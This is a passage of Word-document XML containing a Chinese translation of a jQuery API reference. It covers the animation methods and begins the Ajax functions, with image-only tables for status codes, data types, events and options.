    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>动画选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251776000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3019245" cy="146649"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="120" name="00120.jpeg" descr="00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0.jpeg" descr="00120.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3019245" cy="146649"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.fx.off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将这个属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>会禁用所有特效及动画。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>animate(props,opts)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用由</w:t>
      </w:r>
      <w:r>
        <w:t>opts</w:t>
      </w:r>
      <w:r>
        <w:t>定义的选项，在每个选中元素上以动画方式改变由</w:t>
      </w:r>
      <w:r>
        <w:t>props</w:t>
      </w:r>
      <w:r>
        <w:t>对象指定的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性。这两个对象的细节请参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.5.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>animate(props,[duration],[easing],[f()])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用指定的</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>easing</w:t>
      </w:r>
      <w:r>
        <w:t>函数，在每个选中元素上以动画方式改变由</w:t>
      </w:r>
      <w:r>
        <w:t>props</w:t>
      </w:r>
      <w:r>
        <w:t>对象指定的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性。动画完成时将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每个选中元素的方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>clearQueue([qname="fx"])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为每个选中元素清除特效队列或指定名字的队列。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>delay(duration,[qname="fx"])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>添加指定</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>的延时到特效队列或指定名字的队列中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>dequeue([qname="fx"])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>移除并调用特效队列或指定名字队列中的下一个函数。一般不需要执行这个操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fadeIn([dura</w:t>
      </w:r>
      <w:r>
        <w:t>tion=400],[f()])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fadeOut([duration=400],[f()])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以动画的方式，在指定的</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒内改变选中元素的透明度，以便使它淡入或淡出。完成时，如果调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，则将它作为每个选中元素的方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fadeTo(duration,opacity,[f()])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以动画的方式，在指定的</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒内将选中元素的透明度改变为</w:t>
      </w:r>
      <w:r>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:t>。完成时，如果调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，则将它作为每个选中元素的方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>hide(duration,[f()])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果没有指定参数，则立刻隐藏每个选中元素。否则，以动画的方式改变每个选中元素的尺寸及透明度，让它们在</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒之后隐藏。完成时，如果调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，则将它作为每个选中元素的方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>slideDown([duration=400],[f()])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>slideUp([duration=400],[f()])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>slideToggle([duration=400],[f()])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以动画的方式，在指定的</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>时间内改变每个选中元素的高度，以便显示、隐藏或者切换元素的可见性。完成时，如果调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，则将它作为</w:t>
      </w:r>
      <w:r>
        <w:t>每个选中元素的方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>show()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>show(duration,[f()])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不带参数，则立刻显示每个选中元素。否则，以动画的方式改变每个选中元素的尺寸及透明度，让它们在</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒之后完全可见。完成时，如果调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，则将它作为每个选中元素的方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>stop([clear=false],[jump=false])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在所有选中元素上停止当前动画（如果有正在运行中）。如果</w:t>
      </w:r>
      <w:r>
        <w:t>clear</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则同时也清除每个元素的特效队列。如果</w:t>
      </w:r>
      <w:r>
        <w:t>jump</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则在停止之前跳到动画的最终效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>toggle</w:t>
      </w:r>
      <w:r>
        <w:t>([show])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toggle(duration,[f()])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>ture</w:t>
      </w:r>
      <w:r>
        <w:t>，则调用</w:t>
      </w:r>
      <w:r>
        <w:t>show()</w:t>
      </w:r>
      <w:r>
        <w:t>立刻显示选中元素。如果</w:t>
      </w:r>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则调用</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>立刻隐藏选中元素。如果</w:t>
      </w:r>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:t>省略，则切换元素的可见性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>duration</w:t>
      </w:r>
      <w:r>
        <w:t>，则在指定时间内，通过以动画改变选中元素的尺寸和透明度的方式，切换元素的可见性。完成时，如果调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，则将它作为每个选中元素的方法调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>queue([qname="fx"]):array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>queue([qname="fx"],f(next))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>queue([qn</w:t>
      </w:r>
      <w:r>
        <w:t>ame="fx"],newq)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不带参数或只有一个队列名，则返回第一个选中元素的指定名字的队列。如果传入一个函数参数，则将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>添加到所有选中元素的指定名字的队列中。如果传入一个数组参数，则将所有选中元素的指定名字的队列替换为由函数组成的新数组</w:t>
      </w:r>
      <w:r>
        <w:t>newq</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>大多数相关的功能采用了工具函数的形式，而不是方法。下面是部分</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>库中最复杂的函数。完整细节请参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.6</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>状态码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251777024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2876909" cy="129396"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="121" name="00121.jpeg" descr="00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1.jpeg" descr="00121.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId124"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2876909" cy="129396"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251778048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3252158" cy="129396"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="122" name="00122.jpeg" descr="00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2.jpeg" descr="00122.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId125"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3252158" cy="129396"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251779072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3334109" cy="150962"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="123" name="00123.jpeg" descr="00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3.jpeg" descr="00123.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3334109" cy="150962"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251780096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3334109" cy="577969"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="124" name="00124.jpeg" descr="00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4.jpeg" descr="00124.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId127"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3334109" cy="577969"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.ajax(options):XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是一个复杂但完全通用的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>函数，是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的所有</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>工具的基础。它只需要一个对象作为参数，该对象的属性指定了对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求的所有细节以及处理服务器的响应的处理程序。最常用选项的描述在</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.3</w:t>
      </w:r>
      <w:r>
        <w:t>节，回调选项的描述也在</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.3</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery.ajaxSetup(options)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个函数设置</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
